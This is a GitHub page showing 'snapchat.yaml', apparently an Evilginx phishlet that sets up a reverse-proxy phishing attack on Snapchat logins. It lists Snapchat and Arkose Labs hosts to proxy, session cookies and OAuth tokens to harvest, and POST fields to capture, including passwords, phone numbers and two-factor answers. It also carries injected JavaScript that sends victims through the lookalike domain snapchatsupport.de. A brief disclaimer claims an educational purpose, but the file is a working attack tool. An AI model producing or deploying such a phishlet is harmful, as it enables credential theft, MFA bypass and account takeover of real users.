-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsnapchat.yaml
138 lines (106 loc) · 6.38 KB
/
snapchat.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
# PLEASE DO NOT MISUSE THIS PHISHLET.
author: '@an0nud4y'
min_ver: '3.3.0'
proxy_hosts:
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'snapchat.com', session: true, is_landing: true, auto_filter: true}
- {phish_sub: '', orig_sub: '', domain: 'snapchat.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'snapchat.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'csp-central', orig_sub: 'csp-central', domain: 'appspot.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'us-central1-gcp', orig_sub: 'us-central1-gcp', domain: 'api.snapchat.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'gcp', orig_sub: 'gcp', domain: 'api.snapchat.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'aws', orig_sub: 'aws', domain: 'api.snapchat.com', session: true, is_landing: false, auto_filter: true}
- {phish_sub: 'static', orig_sub: 'static', domain: 'snapchat.com', session: false, is_landing: false, auto_filter: true}
- {phish_sub: 'snap-api', orig_sub: 'snap-api', domain: 'arkoselabs.com', session: true, is_landing: false, auto_filter: true}
# us-central1-gcp.api.snapchat.com
# gcp.api.snapchat.com
# aws.api.snapchat.com
# accounts.snapchat.com
# static.snapchat.com
# iframe.arkoselabs.com
# graphql.contentful.com
# story.snapchat.com
# snap-api.arkoselabs.com
# tr.snapchat.com
# sc-static.net
sub_filters:
- {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
- {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
- {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
- {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
# Main Snapchat domain
- domain: 'snapchat.com'
keys: ['session', 'auth', 'xsrf', 'sc-nt', 'sc-at', 'csrftoken', 'scs', 'sc_sid', 'secure_session_id']
# Snapchat's OAuth and API interactions (SnapKit)
- domain: 'snapkit.snapchat.com'
keys: ['session', 'auth', 'xsrf', 'sc-nt', 'sc-at', 'csrftoken', 'oauth_token', 'oauth_secret']
# Google's App Engine for Snapchat's security and policy handling
- domain: 'appspot.com'
keys: ['session', 'auth', 'xsrf', 'sc-nt', 'sc-at', 'csrftoken']
# Static assets or other services (typically doesn't carry important tokens, but included for completeness)
- domain: 'assets.snapchat.com'
keys: []
# Possible mobile subdomains or additional service domains
- domain: 'm.snapchat.com'
keys: ['session', 'auth', 'xsrf', 'sc-nt', 'sc-at', 'csrftoken', 'scs', 'sc_sid', 'secure_session_id']
- domain: 'ads.snapchat.com'
keys: ['session', 'auth', 'xsrf', 'sc-nt', 'sc-at', 'csrftoken']
auth_urls:
- "/v2/welcome"
- "^/v2/welcome/$"
credentials:
username:
key: "accountIdentifier"
search: "(.*)"
type: "post"
password:
key: "password"
search: "(.*)"
type: "post"
custom:
- key: "email"
search: "email\":\"(.*?)\""
type: "post"
- key: 'ai_token'
search: "(.*)"
type: 'post'
- key: 'twoFAChallengeAnswer'
search: "(.*)"
type: 'post'
- key: 'accountIdentifierCountryCode'
search: "(.*)"
type: 'post'
- key: 'accountIdentifierPhoneNumber'
search: "(.*)"
type: 'post'
js_inject:
- trigger_domains: ["www.snapchatsupport.de"]
trigger_paths: ["/v2/welcome"]
script: |
function handleLogin() {
// Check if login was successful
if (window.location.pathname === "/v2/welcome") {
// Redirect to intermediate URL to capture tokens
window.location.href = "https://accounts.snapchatsupport.de/v2/welcome";
}
}
// Trigger the handleLogin function
setTimeout(handleLogin, 1000); // Adjust the delay if needed
// Optionally, you could handle the redirection on the intermediate page
// This part needs to be added to the intermediate page?s JavaScript
if (window.location.hostname === "accounts.snapchatsupport.de") {
setTimeout(function() {
window.location.href = "https://accounts.snapchat.com/accounts/v2/login";
}, 3000); // Adjust the delay as needed
}
# Defines the domain and path where the login page on the phished website resides.
login:
domain: "accounts.snapchat.com"
path: "/accounts/v2/login"
redirect_url: 'https://accounts.snapchat.com/accounts/v2/login'